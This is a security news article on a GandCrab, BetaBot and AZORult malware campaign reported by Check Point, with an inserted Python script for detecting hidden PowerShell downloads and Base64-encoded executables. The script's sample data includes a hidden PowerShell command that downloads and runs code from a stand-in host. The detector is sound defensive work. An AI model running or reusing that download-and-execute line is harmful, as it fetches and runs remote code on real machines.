- The attackers have been observed launching two variants of GandCrab, a variant of BetaBot and a variant of AZORult infostealer malware.
- The AZORult sample acts as a secondary payload in the attack process.
The prolific GandCrab ransomware is back with a set of trojans that are capable of stealing users’ sensitive data. Recently, the ransomware was used along with Vidar info stealer malware to increase the intensity of cyber espionage.
According to researchers from Check Point, the latest attacks use PowerShell to deliver the first stage of the infection process rather than for the encryption itself.
“From our observation of the above Forensics Report provided by SandBlast Agent, we can understand that the attack begins by launching a hidden PowerShell window with command line arguments to download a secondary payload from an infected hosting provider. Our analysts have confirmed that the online hosted payload is changing frequently in order to escape detection from hash signature based Anti-Viruses,” said Check Point researchers in a blog post.
The payload is the Base64-encoded bytecode of a portable executable (PE) that was created with AutoIt, a freeware automation language for Microsoft Windows. The AutoIt script acts as an unpacker and downloads additional payloads, such as variants of ransomware and trojans.
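As an added example that is not part of this article or of Check Point's report, the following Python script shows how a defender could flag the two observable steps described above in process-creation telemetry: a PowerShell window launched hidden with a download primitive on its command line, and a Base64 blob that decodes to a PE image (the "MZ" DOS header followed by the "PE" signature). The log records, the field names (which mimic a Sysmon process-creation event) and the header-only PE stub are constructed here and are assumptions, not data from the campaign.

```python
import base64
import re

# Constructed process-creation records (not from the article or from Check Point).
# Field names imitate a Sysmon Event ID 1 record and are an assumption.
SAMPLE_EVENTS = [
    {  # hidden window plus a download cmdlet: the pattern the article describes
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\cmd.exe",
        "command_line": "powershell.exe -NoP -W Hidden -c "
                        "\"IEX((New-Object Net.WebClient).DownloadString("
                        "'http://payload.example.invalid/stage2'))\"",
    },
    {  # hidden window but no download: a constructed maintenance task, should not fire
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent": r"C:\Windows\System32\svchost.exe",
        "command_line": r"powershell.exe -NoProfile -W Hidden -File C:\Scripts\inventory.ps1",
    },
]

HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.IGNORECASE)
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# A run of Base64 characters long enough to be worth decoding.
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def is_hidden_powershell_download(cmdline):
    """True when the command line both hides its window and reaches out for content."""
    return bool(HIDDEN_WINDOW.search(cmdline)) and bool(DOWNLOAD_PRIMITIVES.search(cmdline))


def embedded_pe_in_base64(blob):
    """Decode a Base64 candidate and check for a PE image.

    A PE begins with the 'MZ' DOS header; the 4-byte offset of the 'PE\\0\\0'
    signature is stored at 0x3C. Both must line up for a positive result.
    """
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    if len(raw) < 0x40 or raw[:2] != b"MZ":
        return False
    pe_off = int.from_bytes(raw[0x3C:0x40], "little")
    return pe_off + 4 <= len(raw) and raw[pe_off:pe_off + 4] == b"PE\0\0"


def payload_carries_pe(text):
    """True if any Base64 run inside fetched text decodes to a PE image."""
    return any(embedded_pe_in_base64(b) for b in B64_BLOB.findall(text))


def scan_events(events):
    """Return (parent, command line, reasons) for every suspicious record."""
    findings = []
    for ev in events:
        cl = ev["command_line"]
        reasons = []
        if is_hidden_powershell_download(cl):
            reasons.append("hidden PowerShell window with download primitive")
        if payload_carries_pe(cl):
            reasons.append("Base64 blob on command line decodes to a PE image")
        if reasons:
            findings.append((ev["parent"], cl, reasons))
    return findings


def pe_stub_b64():
    """Constructed 'MZ ... PE' header stub, Base64-encoded, used only to exercise the check.

    It is 88 bytes of headers with no code and is not an executable.
    """
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    return base64.b64encode(bytes(hdr) + b"PE\0\0" + bytes(20)).decode()


# Constructed stand-in for a fetched second-stage script carrying an encoded PE.
SAMPLE_PAYLOAD = "$b = '" + pe_stub_b64() + "'"

if __name__ == "__main__":
    for parent, cl, reasons in scan_events(SAMPLE_EVENTS):
        print(parent, "->", cl[:60], "...", reasons)
    print("fetched payload carries PE:", payload_carries_pe(SAMPLE_PAYLOAD))
```

The window-style check alone is deliberately not a detection: plenty of legitimate scheduled scripts run hidden, so the rule requires a download primitive on the same command line, and the PE check validates the header structure rather than trusting the "MZ" prefix. Frequent re-hosting of the payload, which the article notes defeats hash-based signatures, does not affect either check because neither depends on the payload's hash.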
In this attack, the attackers have been observed launching two variants of GandCrab, a variant of BetaBot and a variant of AZORult infostealer malware as a part of a secondary payload.
The variants of GandCrab ensure that the attackers maintain persistence on infected machines even if one variant crashes, thereby enabling the threat actors to keep earning profits.
The BetaBot sample is the first to run in the attack process. Once executed, the trojan is capable of doing several things including injecting itself into explorer.exe. After injection, it connects with the C2 server and downloads a series of other malicious binaries.
These malicious entities are responsible for gathering information about the machine, looking for analysis and debugging tools on the machine, detecting the virtual machine environment and disabling anti-virus and firewall tools.
The AZORult sample acts as a secondary payload in the attack process. The main characteristics of this malware family include harvesting cryptocurrency wallets, extracting credentials saved in FTP/IM/email clients and listening to the C2 server while remaining dormant.
Check Point’s research team highlights that one of the two variants of GandCrab ransomware can cause the system to crash and the Windows Error Reporting application (werfault.exe) to launch.
The other variant of the ransomware gains full administrative privileges on the infected system and then proceeds to encrypt its files.
“After detecting the crash of the GandCrab ransomware, a second variant of GandCrab is launched and successfully gains privilege escalation. This is then able to continue the attack of encrypting files and writing ransomware message files. At the time of the attack this variant had not been seen in the wild,” said Check Point researchers.